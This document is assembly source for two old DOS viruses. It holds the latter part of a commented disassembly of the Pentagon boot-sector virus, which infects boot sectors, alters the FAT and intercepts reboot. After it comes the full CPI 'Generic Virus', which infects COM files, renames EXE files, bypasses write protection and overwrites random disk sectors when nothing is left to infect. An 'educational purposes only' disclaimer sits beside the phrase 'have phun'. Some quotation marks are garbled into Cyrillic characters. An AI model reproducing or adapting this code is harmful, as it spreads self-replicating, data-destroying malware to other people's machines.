    JE    BP04DA            ; Branch if yes
    JMP    BP06FC            ; Pass on to BIOS

BP04DA:    DEC    CS:DB07E0        ; Decrement count
    JZ    BP04E4            ; Infect when zero
    JMP    BP06FC            ; Pass on to BIOS

    ; Get boot sector

BP04E4:    MOV    BYTE PTR CS:DB07E0,10H    ; Set count to 16
    PUSH    CS            ; \
    POP    AX            ;  \ Set DS & ES to CS
    MOV    DS,AX            ;  /
    MOV    ES,AX            ; /
    MOV    BX,0800H        ; Address boot sector store
    MOV    CX,1            ; Track zero, sector one
    MOV    DH,0            ; Head zero
    MOV    DL,CS:DB0790        ; Load device
    MOV    AX,0201H        ; Read one sector
    CALL    BP031B            ; Read from disk
    JNB    BP0508            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

    ; Check for Brain virus

BP0508:    CMP    WORD PTR [BX+4],1234H    ; Is it a Brain boot sector?
    JNE    BP051D            ; Branch if not
    MOV    BYTE PTR CS:DB07E1,0FFH    ; Set Brain switch on
    CALL    BP048D            ; Read actual boot sector
    JNB    BP052D            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

    ; Check for Pentagon virus

BP051D:    MOV    BYTE PTR CS:DB07E1,0    ; Set Brain switch off
    CMP    WORD PTR [BX+4AH],577BH    ; Is it infected by pentagon?
    JNE    BP052D            ; Branch if not
    JMP    BP06FC            ; Pass on to BIOS

    ; Check for DOS boot sector

BP052D:    CMP    WORD PTR [BX+01FEH],0AA55H    ; Is it a valid boot sector
    JE    BP0538            ; Branch if yes
    JMP    BP06FC            ; Pass on to BIOS

    ; Get first FAT sector

BP0538:    ADD    BX,0200H        ; Update buffer address
    INC    CL            ; Next sector
    MOV    AX,0201H        ; Read one sector
    CALL    BP031B            ; Read from disk
    JNB    BP0549            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

    ; Check media byte

BP0549:    CMP    BYTE PTR [BX],0FDH    ; Is it 360K disk
    JE    BP0551            ; Branch if yes
    JMP    BP06FC            ; Pass on to BIOS

    ; Get second sector of FAT

BP0551:    ADD    BX,0200H        ; Update buffer address
    INC    CL            ; Next sector
    MOV    AX,0201H        ; Read one sector
    CALL    BP031B            ; Read from disk
    JNB    BP0562            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

BP0562:    CMP    BYTE PTR CS:DB07E1,0FFH    ; Test Brain switch
    JNE    BP0573            ; Branch if off
    MOV    BX,0A03H        ; Address first cluster in FAT
    MOV    CX,2            ; First cluster is number two
    CALL    BP0391            ; Unflag Brain virus bad clusters
BP0573:    MOV    BX,0A96H        ; \ Start from cluster 100
    MOV    CX,0064H        ; /
    CALL    BP033E            ; Find unused FAT entry pair
    JNB    BP0581            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

BP0581:    MOV    CS:DW0784,CX        ; Save virus cluster number
    INC    CX            ; Next cluster number
    MOV    [BX],CX            ; Put it in first FAT entry
    OR    WORD PTR [BX+01],0FFF0H    ; Flag 2nd entry as EOF
    nop                ; ** length adjustment, MASM 5.0
    DEC    CX            ; Set cluster number back
    CALL    BP03DA            ; Cluster num to trck/hd/sect
    MOV    CS:DW0788,CX        ; Save virus track & sector
    MOV    CS:DW078A,DX        ; Save virus head and drive
    PUSH    BP
    MOV    BP,OFFSET DW008F    ; Address virus pointer
    MOV    CS:[BP+00],CX        ; Save virus track & sector
    MOV    CS:[BP+03],DH        ; Save virus head
    POP    BP
    MOV    BX,0A96H        ; \ Start from cluster 100
    MOV    CX,0064H        ; /
    CALL    BP0368            ; Find an unused FAT entry
    JNB    BP05B7            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

BP05B7:    MOV    CS:DW0786,CX        ; Save file cluster number
    CALL    BP03DA            ; Cluster num to trck/hd/sect
    MOV    CS:DW078C,CX        ; Save file track & sector
    MOV    CS:DW078E,DX        ; Save file head and drive
    PUSH    BP
    MOV    BP,OFFSET DW00D0    ; Address file pointers
    MOV    CS:[BP],CX        ; Save track and sector
    MOV    CS:[BP+3],DH        ; Save head
    POP    BP
    MOV    AL,0FCH            ; Load encryption key
    MOV    BX,0800H        ; Address boot sector store
    MOV    CX,0200H        ; Length to encrypt
    CALL    BP0315            ; Encrypt/decrypt
    MOV    BYTE PTR CS:DB07E0,20H    ; Set count to 32
    LEA    CX,DB07E0        ; Address end of encrypted
    LEA    BX,DB0791        ; Address start of encrypted
    SUB    CX,BX            ; Length to encrypt
    MOV    AL,0AAH            ; Load encryption key
    CALL    BP0315            ; Encrypt/decrypt
    MOV    BX,0200H        ; Virus second sector
    MOV    AX,0301H        ; Write one sector
    MOV    CX,CS:DW0788        ; Get virus track & sector
    MOV    DX,CS:DW078A        ; Get virus head and drive
    MOV    DL,CS:DB0790        ; Load device
    CALL    BP031B            ; Write to disk
    JNB    BP0613            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

BP0613:    MOV    AX,3            ; Three sectors to write
BP0616:    PUSH    AX            ; Save write count
    ADD    BX,0200H        ; Next sector buffer
    MOV    AX,0301H        ; Write one sector
    CALL    BP0300            ; Address to next sector
    CALL    BP031B            ; Write to disk
    JB    BP062D            ; Branch if error
    POP    AX            ; Retrieve write count
    DEC    AX            ; Decrement count
    JNZ    BP0616            ; Repeat for each sector
    JMP    BP0631

BP062D:    POP    AX
    JMP    BP06FC            ; Pass on to BIOS

    ; Write file

BP0631:    LEA    CX,DB07E0        ; Address end of encrypted
    LEA    BX,DB0791        ; Address start of encrypted
    SUB    CX,BX            ; Length to encrypt
    MOV    AL,0AAH            ; Load encryption key
    CALL    BP0315            ; Encrypt/decrypt
    MOV    BYTE PTR CS:DB07E0,10H    ; Set count to 16
    MOV    CX,CS:DW078C        ; Get file track & sector
    MOV    DX,CS:DW078E        ; Get file head and drive
    MOV    DL,CS:DB0790        ; Load device
    MOV    BX,1000H        ; Address file buffer
    MOV    AX,2            ; Two sectors to write
BP065B:    PUSH    AX            ; Save write count
    MOV    AX,0301H        ; Write one sector
    CALL    BP031B            ; Write to disk
    JB    BP062D            ; Branch if error
    CALL    BP0300            ; Address to next sector
    ADD    BX,0200H        ; Address next sector buffer
    POP    AX            ; Retrieve write count
    DEC    AX            ; Decrement write count
    JNZ    BP065B            ; Write each sector
    MOV    BX,OFFSET BP0059    ; Start of encrypted
    MOV    CX,OFFSET DB00C5-BP0059    ; Length to encrypt
    MOV    AL,0FCH            ; Load encryption key
    CALL    BP0315            ; Encrypt
    XOR    BX,BX            ; Address start of virus
    MOV    AX,0301H        ; Write one sector
    MOV    CX,1            ; Track zero, sector 1
    XOR    DH,DH            ; Head zero
    CALL    BP031B            ; Write to disk
    JNB    BP068C            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

    ; Write 1st FAT sector

BP068C:    MOV    BX,OFFSET BP0059
    MOV    CX,OFFSET DB00C5-BP0059    ; Length to decrypt
    MOV    AL,0FCH            ; Load encryption key
    CALL    BP0315            ; Decrypt
    MOV    BX,0A00H        ; Address 1st FAT sector
    MOV    AX,0301H        ; Write one sector
    MOV    CX,2            ; Track zero, sector 2
    CALL    BP031B            ; Write to disk
    JNB    BP06A8            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

    ; Write 2nd FAT sector

BP06A8:    ADD    BX,0200H        ; Address 2nd FAT sector
    MOV    AX,0301H        ; Write one sector
    INC    CX            ; Next sector
    CALL    BP031B            ; Write to disk
    JNB    BP06B8            ; Branch if no error
    JMP    BP06FC            ; Pass on to BIOS

    ; Create directory entries

BP06B8:    MOV    BX,0E00H        ; Address directory
    MOV    CX,5            ; Track zero, sector 5
    XOR    DH,DH            ; Head zero
    MOV    AX,7            ; Seven sectors to read
BP06C3:    PUSH    AX            ; Save read count
    MOV    AX,0201H        ; Read one sector
    CALL    BP0300            ; Address to next sector
    CALL    BP031B            ; Read from disk
    JB    BP06F1            ; Branch if error
    POP    AX            ; \ Retrieve and save read count
    PUSH    AX            ; /
    MOV    BYTE PTR CS:DB07E2,0    ; Set directory update switch off
    CALL    BP0401            ; Update directory
    JNB    BP06F5            ; Branch if entry found
    CMP    BYTE PTR CS:DB07E2,0FFH    ; Test directory update switch
    JNE    BP06EA            ; Branch if off
    MOV    AX,0301H        ; Write one sector
    CALL    BP031B            ; Write to disk
BP06EA:    POP    AX            ; Retrieve sector count
    DEC    AX            ; Decrement sector count
    JNZ    BP06C3            ; Repeat for each sector
    JMP    BP06FC            ; Pass on to BIOS

BP06F1:    POP    AX
    JMP    BP06FC            ; Pass on to BIOS

BP06F5:    POP    AX
    MOV    AX,0301H        ; Write one sector
    CALL    BP031B            ; Write to disk
BP06FC:    POP    DI
    POP    ES
    POP    SI
    POP    DS
    POP    DX
    POP    CX
    POP    BX
    POP    AX
    INT    68H            ; Disk I/O
    RETF    2

        ; Int 9 routine

BP0709:    PUSH    AX
    PUSH    BX
    PUSH    DS
    MOV    BYTE PTR CS:DB07E3,0    ; Set off reboot switch
    XOR    AX,AX            ; \ Address zero
    MOV    DS,AX            ; /
    IN    AL,60H            ; Get keyboard token
    MOV    BX,OFFSET BB0417    ; Address Key states
    TEST    BYTE PTR [BX],8        ; Alt key depressed?
    JZ    BP0736            ; Branch if not
    TEST    BYTE PTR [BX],4        ; Ctrl key depressed?
    JZ    BP0736            ; Branch if not
    CMP    AL,53H            ; Del character token?
    JNE    BP0736            ; Branch if not
    XOR    BYTE PTR [BX],0CH    ; Set off Alt & Ctrl states
    XOR    AL,AL            ; \ ?
    OUT    60H,AL            ; /
    MOV    BYTE PTR CS:DB07E3,0FFH    ; Set on reboot switch
BP0736:    POP    DS
    POP    BX
    POP    AX
    INT    69H            ; Keyboard I/O
    PUSHF
    CMP    BYTE PTR CS:DB07E3,0FFH    ; Test reboot switch
    JNE    BP0765            ; Branch if off
    POPF
    MOV    AX,3            ; Set mode three
    INT    10H            ; VDU I/O
    CLI
    MOV    AL,0AH            ; Repeat delay 10 times
    XOR    CX,CX            ; Maximum loop
BP074F:    LOOP    BP074F            ; Delay
    DEC    AL            ; Decrement delay count
    JNZ    BP074F            ; Repeat delay for count
    CALL    BP04A0            ; Generate a sound
    XOR    CX,CX            ; Maximum loop
BP075A:    LOOP    BP075A            ; Delay
    MOV    BYTE PTR CS:DB07E0,5    ; Set count to 5
    STI
    INT    19H            ; Disk bootstrap

BP0765:    POPF
    RETF    2

    DB    27 DUP (0)

DW0784    DW    0064H            ; Cluster number of virus
DW0786    DW    0066H            ; Cluster number of file
DW0788    DW    0B02H            ; Virus track & sector
DW078A    DW    0101H            ; Virus head and drive
DW078C    DW    0B06H            ; File track and sector
DW078E    DW    0101H            ; File head and drive
DB0790    DB    1            ; Device number

DB0791    DB    'PENTAGONTXT', 21H, 17 DUP (0), 4, 0, 0
DB07B1    DB    'Pentagon,ZG'
DB07BC    DB    '(c) 1987 The Pentagon, Zorell Group$'

DB07E0    DB    20H            ; Infection count
DB07E1    DB    0FFH            ; Infected by Brain switch
DB07E2    DB    0            ; Directory update switch
DB07E3    DB    0            ; Reboot switch

    DB    ' first sector in segment', 0DH, 0AH, 9, 6DH

CODE    ENDS

    END    START


;=============================================================================
;
;                                    C*P*I
;
;                     CORRUPTED PROGRAMMING INTERNATIONAL
;                     -----------------------------------
;                               p r e s e n t s
;
;                                    T H E
;                              _                 _
;                             (g) GENERIC VIRUS (g)
;                              ^                 ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
;   CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR ТPROGRAM TO BIG TO
;    FIT IN MEMORYУ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
;                     THE DISK. HAVE PHUN WITH THIS ONE.
;
;  ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
;  IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
;  THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
;   HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
;  THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
;             ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
;                                                        DOCTOR DISSECTOR
;                                                        CPI ASSOCIATES
;
;=============================================================================

MAIN:
      NOP                       ;| Marker bytes that identify this program
      NOP                       ;| as infected/a virus
      NOP                       ;|

      MOV AX,00                 ;| Initialize the pointers
      MOV ES:[POINTER],AX       ;|
      MOV ES:[COUNTER],AX       ;|
      MOV ES:[DISKS B],AL       ;|

      MOV AH,19                 ;| Get the selected drive (dir?)
      INT 21                    ;|

      MOV CS:DRIVE,AL           ;| Get current path (save drive)
      MOV AH,47                 ;| (dir?)
      MOV DH,0                  ;|
      ADD AL,1                  ;|
      MOV DL,AL                 ;| (in actual drive)
      LEA SI,CS:OLD_PATH        ;|
      INT 21                    ;|

      MOV AH,0E                 ;| Find # of drives
      MOV DL,0                  ;|
      INT 21                    ;|
      CMP AL,01                 ;| (Check if only one drive)
      JNZ HUPS3                 ;| (If not one drive, go the HUPS3)
      MOV AL,06                 ;| Set pointer to SEARCH_ORDER +6 (one drive)

      HUPS3: MOV AH,0           ;| Execute this if there is more than 1 drive
      LEA BX,SEARCH_ORDER       ;|
      ADD BX,AX                 ;|
      ADD BX,0001               ;|
      MOV CS:POINTER,BX         ;|
      CLC                       ;|

CHANGE_DISK:                    ;| Carry is set if no more .COM files are
      JNC NO_NAME_CHANGE        ;| found. From here, .EXE files will be
      MOV AH,17                 ;| renamed to .COM (change .EXE to .COM)
      LEA DX,CS:MASKE_EXE       ;| but will cause the error message ТProgram 
      INT 21                    ;| to large to fit in memoryУ when starting
      CMP AL,0FF                ;| larger infected programs
      JNZ NO_NAME_CHANGE        ;| (Check if an .EXE is found)

      MOV AH,2CH                ;| If neither .COM or .EXE files can be found,
      INT 21                    ;| then random sectors on the disk will be
      MOV BX,CS:POINTER         ;| overwritten depending on the system time
      MOV AL,CS:[BX]            ;| in milliseconds. This is the time of the
      MOV BX,DX                 ;| complete ТinfectionУ of a storage medium.
      MOV CX,2                  ;| The virus can find nothing more to infect
      MOV DH,0                  ;| starts its destruction.
      INT 26                    ;| (write crap on disk)

NO_NAME_CHANGE:                 ;| Check if the end of the search order table
      MOV BX,CS:POINTER         ;| has been reached. If so, end.
      DEC BX                    ;|
      MOV CS:POINTER,BX         ;|
      MOV DL,CS:[BX]            ;|
      CMP DL,0FF                ;|
      JNZ HUPS2                 ;|
      JMP HOPS                  ;|
     
HUPS2:                          ;| Get a new drive from the search order table
      MOV AH,0E                 ;| and select it, beginning with the ROOT dir.
      INT 21                    ;| (change drive)
      MOV AH,3B                 ;| (change path)
      LEA DX,PATH               ;|
      INT 21                    ;|
      JMP FIND_FIRST_FILE       ;|

FIND_FIRST_SUBDIR:              ;| Starting from the root, search for the
      MOV AH,17                 ;| first subdir. First, (change .exe to .com)
      LEA DX,CS:MASKE_EXE       ;| convert all .EXE files to .COM in the
      INT 21                    ;| old directory.
      MOV AH,3B                 ;| (use root directory)
      LEA DX,PATH               ;|
      INT 21                    ;|
      MOV AH,04E                ;| (search for first subdirectory)
      MOV CX,00010001B          ;| (dir mask)
      LEA DX,MASKE_DIR          ;|
      INT 21                    ;|
      JC CHANGE_DISK            ;|
      MOV BX,CS:COUNTER         ;|
      INC BX                    ;|
      DEC BX                    ;|
      JZ  USE_NEXT_SUBDIR       ;|

FIND_NEXT_SUBDIR:               ;| Search for the next sub-dir, if no more
      MOV AH,4FH                ;| are found, the (search for next subdir)
      INT 21                    ;| drive will be changed.
      JC CHANGE_DISK            ;|
      DEC BX                    ;|
      JNZ FIND_NEXT_SUBDIR      ;|

USE_NEXT_SUBDIR:     
      MOV AH,2FH                ;| Select found directory. (get dta address)
      INT 21                    ;|
      ADD BX,1CH                ;|
      MOV ES:[BX],WУ\У          ;| (address of name in dta)
      INC BX                    ;|
      PUSH DS                   ;|
      MOV AX,ES                 ;|
      MOV DS,AX                 ;|
      MOV DX,BX                 ;|
      MOV AH,3B                 ;| (change path)
      INT 21                    ;|
      POP DS                    ;|
      MOV BX,CS:COUNTER         ;|
      INC BX                    ;|
      MOV CS:COUNTER,BX         ;|

FIND_FIRST_FILE:                ;| Find first .COM file in the current dir.
      MOV AH,04E                ;| If there are none, (Search for first)
      MOV CX,00000001B          ;| search the next directory. (mask)
      LEA DX,MASKE_COM          ;|
      INT 21                    ;|
      JC FIND_FIRST_SUBDIR      ;|
      JMP CHECK_IF_ILL          ;|

FIND_NEXT_FILE:                 ;| If program is ill (infected) then search
      MOV AH,4FH                ;| for another. (search for next)
      INT 21                    ;|
      JC FIND_FIRST_SUBDIR      ;|

CHECK_IF_ILL:                   ;| Check if already infected by virus.
      MOV AH,3D                 ;| (open channel)
      MOV AL,02                 ;| (read/write)
      MOV DX,9EH                ;| (address of name in dta)
      INT 21                    ;|
      MOV BX,AX                 ;| (save channel)
      MOV AH,3FH                ;| (read file)
      MOV CH,BUFLEN             ;|
      MOV DX,BUFFER             ;| (write in buffer)
      INT 21                    ;|
      MOV AH,3EH                ;| (close file)
      INT 21                    ;|
      MOV BX,CS:[BUFFER]        ;| (look for three NOPХs)
      CMP BX,9090               ;|
      JZ FIND_NEXT_FILE         ;|

      MOV AH,43                 ;| This section by-passes (write enable)
      MOV AL,0                  ;| the MS/PC DOS Write Protection.
      MOV DX,9EH                ;| (address of name in dta)
      INT 21                    ;|
      MOV AH,43                 ;|
      MOV AL,01                 ;|
      AND CX,11111110B          ;|
      INT 21                    ;|

      MOV AH,3D                 ;| Open file for read/write (open channel)
      MOV AL,02                 ;| access (read/write)
      MOV DX,9EH                ;| (address of name in dta)
      INT 21                    ;|

      MOV BX,AX                 ;| Read date entry of program and (channel)
      MOV AH,57                 ;| save for future use. (get date)
      MOV AL,0                  ;|
      INT 21                    ;|
      PUSH CX                   ;| (save date)
      PUSH DX                   ;|

      MOV DX,CS:[CONTA W]       ;| The jump located at 0100h (save old jmp)
      MOV CS:[JMPBUF],DX        ;| the program will be saved for future use.
      MOV DX,CS:[BUFFER+1]      ;| (save new jump)
      LEA CX,CONT-100           ;|
      SUB DX,CX                 ;|
      MOV CS:[CONTA],DX         ;|

      MOV AH,57                 ;| The virus now copies itself to (write date)
      MOV AL,1                  ;| to the start of the file.
      POP DX                    ;|
      POP CX                    ;| (restore date)
      INT 21                    ;|
      MOV AH,3EH                ;| (close file)
      INT 21                    ;|

      MOV DX,CS:[JMPBUF]        ;| Restore the old jump address. The virus
      MOV CS:[CONTA],DX         ;| at address ТCONTAУ the jump which was at the
                                ;| start of the program. This is done to
HOPS:                           ;| preserve the executability of the host
      NOP                       ;| program as much as possible. After saving,
      CALL USE_OLD              ;| it still works with the jump address in the
                                ;| virus. The jump address in the virus differs
                                ;| from the jump address in memory
   
CONT  DB  0E9                   ;| Continue with the host program (make jump)
CONTA DW  0                     ;|
      MOV AH,00                 ;|
      INT 21                    ;|

USE_OLD:
      MOV AH,0E                 ;| Reactivate the selected (use old drive)
      MOV DL,CS:DRIVE           ;| drive at the start of the program, and
      INT 21                    ;| reactivate the selected path at the start
      MOV AH,3B                 ;| of the program.(use old drive)
      LEA DX,OLD_PATH-1         ;| (get old path and backslash)
      INT 21                    ;|
      RET                       ;|

SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF

POINTER      DW   0000          ;| (pointer f. search order)
COUNTER      DW   0000          ;| (counter f. nth. search)
DISKS        DB   0             ;| (number of disks)
MASKE_COM    DB Т*.COMУ,00      ;| (search for com files)
MASKE_DIR    DB Т*У,00          ;| (search for dirХs)
MASKE_EXE    DB 0FF,0,0,0,0,0,00111111XB
             DB 0,У????????EXEУ,0,0,0,0
             DB 0,У????????COMУ,0
MASKE_ALL    DB 0FF,0,0,0,0,0,00111111XB
             DB 0,У???????????У,0,0,0,0
             DB 0,У????????COMУ,0

BUFFER EQU 0E00                 ;| (a safe place)

BUFLEN EQU 208H                 ;| Length of virus. Modify this accordingly
                                ;| if you modify this source. Be careful
                                ;| for this may change!

JMPBUF EQU BUFFER+BUFLEN        ;| (a safe place for jmp)

PATH  DB Т\У,0                  ;| (first place)
DRIVE DB 0                      ;| (actual drive)
BACK_SLASH DB Т\У
OLD_PATH DB 32 DUP (?)          ;| (old path)